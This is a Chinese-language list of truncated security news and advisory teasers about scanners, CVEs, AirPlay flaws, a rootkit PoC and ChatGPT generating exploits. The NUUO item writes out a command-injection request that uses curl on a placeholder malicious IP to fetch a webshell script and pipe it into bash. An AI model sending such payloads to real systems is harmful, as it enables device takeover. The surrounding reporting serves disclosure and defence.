Milkyway【具备效的机器探活,端口探活,协议识别,指纹识别,漏洞扫描等功能的全方位扫描工具】 原创 白帽学子 白帽学子 2025-05-08 00:11 昨天用Milkyway给某政务云做全端口扫描,这工具的乱序模式直接把效率拉满,咱俩唠唠它怎么在实战里真香。 上周红队演练,甲方要求48小时内摸清某金融城的暴露面。用FOFA语句拉取目标的时候,这货直接支持环境变量自动填充,省了我手动填密钥的
继续阅读【漏洞通告】Kibana 原型污染导致任意代码执行漏洞 (CVE-2025-25014) 启明星辰安全简讯 2025-05-07 10:09 一、漏洞概述 漏洞名称 Kibana 原型污染导致任意代码执行漏洞 CVE ID CVE-2025-25014 漏洞类型 原型污染 发现时间 2025-05-07 漏洞评分 9.1 漏洞等级 严重 攻击向量 网络 所需权限 高 利用难度 低 用户交互 不需要
继续阅读AirPlay 曝“AirBorne”蠕虫级 0-Click RCE 漏洞!无需交互即可入侵 iPhone/Mac 原创 Hankzheng 技术修道场 2025-05-07 00:53 紧急安全警报!如果您是苹果用户或使用任何支持苹果 AirPlay 无线投屏/音频流技术的设备,请务必关注:以色列网络安全公司 Oligo 近日披露了 AirPlay 协议中存在的一组被命名为 “AirBorne”
继续阅读可蠕虫化AirPlay漏洞:公共WiFi环境下可零点击远程控制苹果设备 FreeBuf 2025-05-06 10:29 网络安全研究人员近日披露了苹果AirPlay协议中一系列现已修复的安全漏洞,攻击者成功利用这些漏洞可控制支持该专有无线技术的设备。以色列网络安全公司Oligo将这些漏洞统称为AirBorne。 01 漏洞组合可形成蠕虫式攻击 研究人员Uri Katz、Avi Lumelsky和
继续阅读苹果“AirBorne”漏洞可能导致零点击 AirPlay RCE 攻击 胡金鱼 嘶吼专业版 2025-05-06 06:00 苹果的AirPlay协议和AirPlay软件开发工具包(SDK)中的一系列安全漏洞使未打补丁的第三方和苹果设备暴露于各种攻击中,包括远程代码执行。 网络安全公司Oligo Security的安全研究人员发现并报告了这些漏洞,他们可以利用零点击和一键式RCE攻击、中间人(M
继续阅读Ingram【网络摄像头漏洞扫描工具】 原创 白帽学子 白帽学子 2025-05-05 00:11 网络摄像头的安全检查可是个重要活儿。很多时候,我们得对大量的网络摄像头设备进行漏洞扫描,看看有没有安全隐患,不然一旦被黑客利用,那可就麻烦大了。 之前我在一次hvv行动中,就遇到要对一批网络摄像头进行漏洞排查的任务。要扫描的设备数量不少,涵盖了海康、大华、宇视、dlink 这些常见品牌。我就想着得找
继续阅读SAP NetWeaver RCE 漏洞 (CVE-2025-31324):深度剖析、高级威胁与全方位防御策略 sec0nd安全 2025-05-04 13:58 针对 SAP NetWeaver 的高危远程代码执行漏洞 CVE-2025-31324,攻击活动仍在持续,已对包括多家世界500强在内的全球企业构成实质性威胁。 SAP NetWeaver:企业数字化引擎,安全重于泰山 SAP NetW
继续阅读AirBorne漏洞可导致苹果设备被完全劫持 网络安全与人工智能研究中心 2025-05-04 08:48 苹果AirPlay协议及SDK中的漏洞使苹果及第三方设备面临攻击风险,包括远程代码执行。 网络安全公司Oligo在苹果AirPlay协议及软件开发套件(SDK)中发现一系列严重漏洞(统称为AirBorne),影响苹果及第三方设备。攻击者可利用这些漏洞实施零点击/单点击远程代码执行(RCE)、
继续阅读Spring Security CVE-2025-22234 引入用户名枚举向量 Ots安全 2025-05-03 05:48 产品: Spring Security 受影响的软件包: spring-security-crypto 受影响的版本: =5.7.16、=5.8.18、=6.0.16、=6.1.14、=6.2.10、=6.3.8、=6.4.4 GitHub 仓库: https://spr
继续阅读【情报】CVE出现罕见的10.0评分漏洞,SAP NetWeaver存在RCE漏洞 原创 visionsec 安全视安 2025-05-01 05:21 漏洞概述 SAP NetWeaver Visual Composer的Metadata Uploader模块缺失必要的授权校验,攻击者可通过未经身份验证的POST请求向/developmentserver/metadatauploader 端点上
继续阅读AirPlay 协议中易受蠕虫攻击的零点击远程代码执行 (RCE) 漏洞使 Apple 和 IoT 设备面临风险 Ots安全 2025-05-01 04:17 Oligo Security Research 发现 Apple 的 AirPlay 协议和 AirPlay 软件开发工具包 (SDK) 中存在一组新的漏洞,第三方供应商使用该工具包将 AirPlay 集成到第三方设备中。 这些漏洞会导致一
继续阅读苹果的“AirBorne”漏洞可能导致零点击 AirPlay RCE 攻击 独眼情报 2025-04-30 04:53 苹果 苹果 AirPlay 协议和 AirPlay 软件开发工具包 (SDK) 中的一组安全漏洞使未修补的第三方和苹果设备容易受到各种攻击,包括远程代码执行。 根据发现并报告这些漏洞的网络安全公司 Oligo Security 的安全研究人员的说法,这些漏洞可被用于零点击和一点击
继续阅读苹果 “AirBorne” 漏洞可导致零点击 AirPlay RCE 攻击 Sergiu Gatlan 代码卫士 2025-04-30 04:04 聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 苹果 AirPlay 协议和 AirPlay 软件开发包 (SDK) 中存在多个漏洞,可导致未修复的第三方和苹果设备易受多种攻击,如远程代码执行等。 网络安全公司 Oligo Security 的安
继续阅读Apache Tomcat发布安全更新,修复两个关键安全漏洞 原创 ralap 网络个人修炼 2025-04-30 02:24 Apache 软件基金会于近日发布了针对其著名 Servlet 容器 Apache Tomcat 的安全更新,修复了两个关键的安全漏洞,分别被编号为 CVE-2025-31650 和 CVE-2025-31651。这些漏洞可能影响用户的应用服务器安全性,并导致拒绝服务
继续阅读AirPlay 零点击 RCE 漏洞可通过 Wi-Fi 实现远程设备接管 会杀毒的单反狗 军哥网络安全读报 2025-04-30 01:01 导读 苹果 AirPlay 协议中存在一个严重漏洞,称为 AirBorne,该漏洞导致超过 23.5 亿台活跃的苹果设备和数千万台第三方设备面临无需用户交互的远程代码执行 (RCE) 攻击。 Oligo Security 研究人员发现,该漏洞允许同一Wi-F
继续阅读具有资产测绘、子域名枚举、信息泄露检测、漏洞扫描、目录扫描、子域名接管、爬虫、页面监控功能的工具 原创 白帽学子 白帽学子 2025-04-30 00:11 兄弟们,之前hvv演练又给我整破防了——甲方给的资产清单像开盲盒,子域名列表比双十一快递还多,半夜两点还要盯着漏洞复现情况。 这时候突然想起工位抽屉里那把”瑞士军刀”,掏出Scope Sentry边啃泡面边操作R
继续阅读PoC级Rootkit”Curing”突破传统Linux检测机制 鹏鹏同学 黑猫安全 2025-04-29 01:29 该概念验证型Rootkit利用Linux异步I/O机制io_uring实现无系统调用攻击,成功规避主流安全监测方案。研究团队在GitHub披露:”Curing通过io_uring执行各类操作而无需触发系统调用,使依赖syscall监控的安全工具
继续阅读核弹级漏洞预警|NUUO监控设备远程沦陷实录(CVE-2025-1338) 云梦DC 云梦安全 2025-04-28 01:01 0x01 漏洞杀伤链 攻击向量: GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1 Host: target-ip 实现效果: ✅ 任意命令执行(代码注入) ✅ /e
继续阅读CVE-2025-43859:Python h11 HTTP 库中的请求走私漏洞 NightTeam 夜组OSINT 2025-04-28 00:00 漏洞描述 h11 是一个极简的、与 I/O 无关的、用 Python 编写的 HTTP/1.1 协议库,该库中发现了一个严重漏洞,编号为 CVE-2025-43859。该漏洞的 CVSS 评级为 9.1,当 h11 与配置错误或存在缺陷的 HTTP
继续阅读分享常见的逻辑漏洞挖掘方法(第二部分) sec0nd安全 2025-04-27 05:58 001 引言 上次我们给大家介绍了常见的逻辑漏洞越权和任意用户注册,如果你还没看,记得看哦,文章在这里。 分享常见的逻辑漏洞挖掘方法(第一部分) 这次我们继续给大家介绍几个逻辑漏洞:任意密码重置和支付漏洞,这两个漏洞的危害也是不容小觑,具体怎么挖掘呢,我们一探究竟。 002 逻辑漏洞介绍 上一篇已经介绍
继续阅读信息安全漏洞周报【第019期】 零零捌信安观察 银天信息 2025-04-25 09:15 点击蓝字 关注我们 零零捌信安观察近期注意到,国家信息安全漏洞共享平台(CNVD)及国家信息安全漏洞库(CNNVD)等权威机构发布了最新的安全公告。经过我们团队的分析和筛查,我们收录了以下被认定为风险的安全漏洞信息。 目前,相关官方机构已经发布了针对这些安全漏洞的补丁和修复方案。我们建议相关用户和组织及时关
继续阅读上周关注度较高的产品安全漏洞(20250414-20250420) 金瀚信安 2025-04-25 06:36 一、境外厂商产品漏洞 1、F5 BIG-IP拒绝服务漏洞(CNVD-2025-07325) F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。F5 BIG-IP存在安全漏洞,该漏洞源于当禁用了SNMP v1或v2c时,攻击者可利用该
继续阅读Redis 漏洞导致服务器遭受拒绝服务攻击 夜组OSINT 2025-04-25 00:01 前言 Redis 漏洞导致服务器遭受拒绝服务攻击 流行的开源内存数据结构存储系统 Redis 中发现了一个高危漏洞,该漏洞可能允许未经身份验证的用户耗尽服务器内存并导致拒绝服务 (DoS) 攻击。该漏洞编号为 CVE-2025-21605,影响 Redis 2.6 及以上版本的所有版本,CVSS 评分为
继续阅读GitLab安全通告 | 修复了XSS 和帐户接管漏洞 夜组OSINT 2025-04-25 00:01 GitLab 发布了一份安全公告,敦促用户立即升级其自主管理的 GitLab 安装。公告重点介绍了 GitLab 社区版 (CE) 和企业版 (EE) 的 17.11.1、17.10.5 和 17.9.7 版本,以解决“重要的错误和安全修复” 。 XSS和帐户接管风险 该公告详细说明了多个漏洞
继续阅读利用 Windows 更新堆栈获取系统访问权限(CVE-2025-21204)附exploit sec0nd安全 2025-04-24 12:51 CVE-2025-21204 是 Windows 更新堆栈中的一个本地提权漏洞。攻击者通过滥用目录连接点或符号链接,可以劫持由 MoUsoCoreWorker.exe 等以 SYSTEM 级别运行的进程所访问的可信路径,并以提升的权限执行任意代码。该
继续阅读【漏洞通告】PyTorch 远程命令执行漏洞(CVE-2025-32434) 启明星辰安全简讯 2025-04-24 08:41 一、漏洞概述 漏洞名称 PyTorch 远程命令执行漏洞 CVE ID CVE-2025-32434 漏洞类型 命令执行 发现时间 2025-04-24 漏洞评分 9.3 漏洞等级 严重 攻击向量 网络 所需权限 无 利用难度 低 用户交互 不需要 PoC/EXP 未公
继续阅读大模型10大网络安全威胁及防范策略 | ChatGPT在公开漏洞利用代码发布前成功生成CVE有效攻击程序 e安在线 e安在线 2025-04-24 05:05 大模型10大网络安全威胁及防范策略 OWASP发布的《大语言模型人工智能应用Top10安全威胁2025》,大语言模型人工智能应用中存在的十大安全风险,相比2023版有一些变化, 10大安全威胁如下: 1、提示词注入:用户通过特殊输入改变模型
继续阅读GitLab 发布安全更新以修复 XSS 和帐户接管漏洞 独眼情报 2025-04-24 03:57 GitLab 发布了安全公告,敦促用户立即升级其自管理的 GitLab 安装。该公告强调了 GitLab Community Edition (CE) 和 Enterprise Edition (EE) 的 17.11.1、17.10.5 和 17.9.7 版本的发布,以解决“ 重要的错误和安全修
继续阅读隐秘的后门:HTTP参数污染漏洞如何让黑客悄悄获取管理员权限 原创 VlangCN HW安全之路 2025-04-23 11:41 在网络安全的世界中,有些看似简单的漏洞往往蕴含着强大的破坏力。HTTP参数污染(HPP)就是这样一种容易被忽视但威力巨大的漏洞。本文将带您深入了解一次真实的HTTP参数污染漏洞挖掘经历,以及这种漏洞如何从一个普通的请求转变为严重的安全威胁。 系统侦察:发现目标的第一步
继续阅读通过代理实现代码执行——DLL劫持的另一种方式 Ots安全 2025-04-23 11:10 在不断发展的网络安全格局中,攻击者不断设计出新的方法来利用终端中的漏洞执行恶意代码。DLL 劫持是最近越来越流行的一种方法。虽然 DLL 劫持攻击有多种形式,但本文将探讨一种称为 DLL 代理的特定攻击类型,深入分析其工作原理、潜在风险,并简要介绍发现这些易受攻击的 DLL 的方法。这种方法导致发现了几个
继续阅读